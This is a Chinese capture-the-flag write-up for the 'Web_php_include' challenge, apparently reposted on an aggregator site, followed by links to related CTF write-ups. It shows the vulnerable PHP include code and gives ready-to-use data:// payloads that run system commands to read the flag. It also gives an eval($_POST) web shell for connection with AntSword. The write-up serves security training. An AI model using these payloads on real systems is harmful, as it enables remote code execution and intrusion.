2. 程式人生 > 實用技巧 >攻防世界-web進階-Web_php_include

攻防世界-web進階-Web_php_include

阿新 發佈:2020-10-23

從程式碼中得知page中帶有php://的都會被替換成空

str_replace()以其他字元替換字串中的一些字元(區分大小寫)

strstr() 查詢字串首次出現的位置。返回字串剩餘部分

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

  

方法一(data://偽協議執行命令利用)

使用方法:data://text/plain;base64,xxxx(base64編碼後的資料)

<?php system("dir")?> base64編碼後使用

?page=data://text/plain/;base64,dW5kZWZpbmVkPD9waHAgc3lzdGVtKCJkaXIiKT8%2b
(編碼後的+號要URL編碼)

  

<?php system("cat fl4gisisish3r3.php")?> base64編碼後使用

?page=data://text/plain/;base64,PD9waHAgc3lzdGVtKCJjYXQgZmw0Z2lzaXNpc2gzcjMucGhwIik/PiA=

  

檢視原始碼

方法二(data://偽協議傳木馬)

<?php eval($_POST[shell]); ?> base64加密後拼接

?page=data://text/plain/;base64,PD9waHAgZXZhbCgkX1BPU1Rbc2hlbGxdKTsgPz4=

  

蟻劍連線,密碼shell

相關推薦

攻防世界-web-Web_php_include

從程式碼中得知page中帶有php://的都會被替換成空 str_replace()以其他字元替換字串中的一些字元(區分大小寫)

攻防世界web(一)

1.PHP_python_template_injection 1.題目提示python模板注入,測試http://220.249.52.133:47149/{{7+7}},發現回顯“URL http://220.249.52.133:47149/14 not found”,說明括號裡的程式碼被執行了,存在SSTI。

攻防世界 - Web(二)

supersqli: (!!!) 1.判斷有誤注入,1\'報錯, 1’ 報錯,1’# 正常且為True,1’ and 1=1# 正常且為True,1’ and 1=2# 正常且為False,所以它裡邊存在注入。

攻防世界-Web-supersqli

很久之前做的題目了,現在拿到有點想不起來,記一下方法 其一:堆疊注入(rename+alter)

攻防世界web題—bug

攻防世界web題—bug 1、開啟題目看一下原始碼,沒有問題 2、掃一下目錄,沒有問題

攻防世界web題—unfinish

攻防世界web題—unfinish 1、看一下題目提示SQL 2、開啟題目看一下原始碼,沒有問題

攻防世界 - Misc(一)

base64÷4: 1.下載附件,是一個.txt檔案,開啟是一串字元, 666C61677B45333342374644384133423834314341393639394544444241323442363041417D

攻防世界-高手區通關筆記

高手區-通關筆記 baby_web 根據提示:想想初始頁面是哪個 我們輸入index.php發現還是回到了1.php,應該是重定向了,此處有兩種思路

攻防世界_MISC區_Get-the-key.txt(詳細)

攻防世界MISC之Get-the-key.txt 啥話也不說,咱們直接看題吧! 首先下載附件看到一個壓縮包:

攻防世界MISC—區1-10

1.something_in_image zip中的檔案用010 Editor開啟後直接搜尋flag,即可找到flag 2.wireshark-1

攻防世界MISC—區21-30

21.easycap 得到一個pcap檔案,協議分級統計,發現都是TCP協議 直接追蹤tcp流,得到FLAG

攻防世界-web-高手區017-supersqli

方法一: 1.輸入1’發現不回顯,然後1’ #顯示正常,應該是存在sql注入了      

攻防世界 WEB 高手區 HCTF 2018 warmup Writeup

攻防世界 WEB 高手區 HCTF 2018 warmup Writeup 題目介紹 題目來源: HCTF 2018 題目描述:warmup

攻防世界 WEB 高手區 tinyctf-2014 NaNNaNNaNNaN-Batman Writeup

攻防世界 WEB 高手區 tinyctf-2014NaNNaNNaNNaN-BatmanWriteup 題目介紹 題目考點 瞭解js程式碼(eval函式、splice函式)

攻防世界 WEB 高手區 NSCTF web2 Writeup

攻防世界 WEB 高手區 NSCTF web2 Writeup 題目介紹 題目考點 php基本函式語法 加密解密函式 base64_decode()、str_rot13()

攻防世界-web-love_math(base_convert位制轉換繞過白名單和長度限制)

題目來源:CISCN題目描述:解密 進入介面 <?php error_reporting(0); //聽說你很喜歡數學,不知道你是否愛它勝過愛flag

XCTF WEB 區 001-004 WP

XCTF WEB 區 001-004 WP 001.baby_web 開啟主頁index.php,會自動跳轉回1.php直接抓包獲得flag

攻防世界-web-unfinish(sql二次注入)

題目來源:網鼎杯 2018題目描述:SQL 題目如下,是個登入頁面 通過awvs掃描得知存在register.php註冊頁面,並且註冊介面存在SQL盲注漏洞。

攻防世界-web-php_rce(ThinkPHP 5.0命令執行漏洞)

本題進入場景後顯示如下頁面 這是一個 thinkphp 框架,先檢視版本號。在網址上隨意輸入一個不存在的模組 地址:

攻防世界-web-ics-07(PHP弱型別、linux目錄結構特性繞過檔案型別過濾)

工控雲管理系統專案管理頁面解析漏洞。 進入題目後,點選進入專案管理頁面。